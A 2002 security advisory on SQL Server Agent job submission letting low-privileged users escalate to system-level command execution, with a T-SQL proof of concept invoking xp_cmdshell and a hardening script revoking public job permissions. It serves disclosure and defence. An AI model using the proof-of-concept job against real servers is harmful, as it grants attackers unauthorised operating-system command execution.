Microsoft SQL Server Agent Jobs Vulnerabilities (#NISR15002002B)

From: David Litchfield (davidat_private)
Date: Thu Aug 15 2002 - 20:14:04 PDT

    NGSSoftware Insight Security Research Advisory
    
    Name: SQL Agent Jobs
    Systems: Microsoft SQL Server 2000 and 7
    Severity: High Risk
    Category: Privilege Escalation
    Vendor URL: http://www.microsoft.com/
    Author: David Litchfield (davidat_private)
    Advisory URL: http://www.ngssoftware.com/advisories/mssql-esppu.txt
    Date: 15th August 2002
    Advisory number: #NISR15002002B
    
    
    Description
    ***********
    With Microsoft SQL Server 2000 and 7 comes a "helper" service, the SQL
    Server Agent. The Agent is responsible for restarting the database service
    if it stops for some reason, has a role to play in replication and runs
    scheduled jobs. As the public role can submit jobs to the SQL Agent to be
    executed, a low privileged user may use this to gain control of the server.
    
    Details
    *******
    The 'public' role is allowed to create and submit jobs to be executed by the
    SQL Agent. To do this one would use a combination of several stored
    procedures in the msdb database such as sp_add_job, sp_add_jobstep, etc.
    As the SQL Agent is considerably more privileged than a simple login, often
    running in the security context of the local system account, it must ensure
    that a T-SQL job submitted to it can't be abused. To defend against this it
    performs a
    
    SETUSER N'guest' WITH NORESET
    
    This effectively drops its high level of privileges so no low privileged
    login can submit something like
    
    exec master..xp_cmdshell 'dir'
    
    However, this can be trivially bypassed by causing the SQL Agent to
    reconnect after it has dropped its privileges. A low privileged login can
    do this using one of the vulnerable extended stored procedures discussed in
    the NGSSoftware Alert NISR15002002A
    (http://www.ngssoftware.com/advisories/mssql-esppu.txt).
    
    Proof of Concept
    ****************
    
    
    -- GetSystemOnSQL
    -- For this to work the SQL Agent should be running.
    -- Further, you'll need to change SERVER_NAME in
    -- sp_add_jobserver to the SQL Server of your choice
    --
    -- David Litchfield
    -- (davidat_private)
    -- 18th July 2002
    
    USE msdb
    
    EXEC sp_add_job @job_name = 'GetSystemOnSQL',
        @enabled = 1,
        @description = 'This will give a low privileged user access to xp_cmdshell',
        @delete_level = 1
    
    EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
        @step_name = 'Exec my sql',
        @subsystem = 'TSQL',
        @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
    
    EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
    @server_name = 'SERVER_NAME'
    
    EXEC sp_start_job @job_name = 'GetSystemOnSQL'
    
    
    Fix Information
    ***************
    NGSSoftware informed Microsoft of these issues in July. To prevent low
    privileged users from submitting jobs, one should disallow public access to
    the job-related stored procedures in the msdb database, particularly
    
    sp_add_job
    sp_add_jobstep
    sp_add_jobserver
    sp_start_job
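    
    The following T-SQL script applies that fix and verifies it. It is an added
    example, not part of the NGSSoftware advisory; it assumes SQL Server 2000
    syntax, and the role name job_submitters and the login placeholder are
    hypothetical.

```sql
-- Added example (not from the advisory): audit and remove public's ability
-- to create and start SQL Agent jobs in msdb. Assumes SQL Server 2000.
USE msdb
GO

-- 1. Audit: list who currently holds permissions on each job procedure.
--    On a default install each reports an EXECUTE grant to public.
EXEC sp_helprotect @name = 'sp_add_job'
EXEC sp_helprotect @name = 'sp_add_jobstep'
EXEC sp_helprotect @name = 'sp_add_jobserver'
EXEC sp_helprotect @name = 'sp_start_job'
GO

-- 2. Remove the default grants from public. REVOKE (rather than DENY) is
--    used so that a named role can still be granted the right below;
--    a DENY on public would override any GRANT to that role.
REVOKE EXECUTE ON sp_add_job       FROM public
REVOKE EXECUTE ON sp_add_jobstep   FROM public
REVOKE EXECUTE ON sp_add_jobserver FROM public
REVOKE EXECUTE ON sp_start_job     FROM public
GO

-- 3. Re-grant only to a dedicated role for accounts that legitimately
--    need to submit jobs. Members of sysadmin are unaffected by all of
--    this, since they bypass permission checks entirely.
EXEC sp_addrole 'job_submitters'            -- hypothetical role name
GRANT EXECUTE ON sp_add_job       TO job_submitters
GRANT EXECUTE ON sp_add_jobstep   TO job_submitters
GRANT EXECUTE ON sp_add_jobserver TO job_submitters
GRANT EXECUTE ON sp_start_job     TO job_submitters
-- The msdb user must already exist; replace the placeholder:
-- EXEC sp_addrolemember 'job_submitters', '<msdb_user_needing_jobs>'
GO

-- 4. Verify: public should no longer appear with EXECUTE on any of them.
EXEC sp_helprotect @name = 'sp_add_job',       @username = 'public'
EXEC sp_helprotect @name = 'sp_add_jobstep',   @username = 'public'
EXEC sp_helprotect @name = 'sp_add_jobserver', @username = 'public'
EXEC sp_helprotect @name = 'sp_start_job',     @username = 'public'
GO
```

    Re-run the audit step after applying vendor patches or service packs, since
    setup scripts can restore the default msdb grants.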
    
    Further, Microsoft has released a patch that fixes several extended stored
    procedure vulnerabilities that can be used in conjunction with a job to gain
    extra privileges.
    
    Please see
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-042.asp
    for more details.
    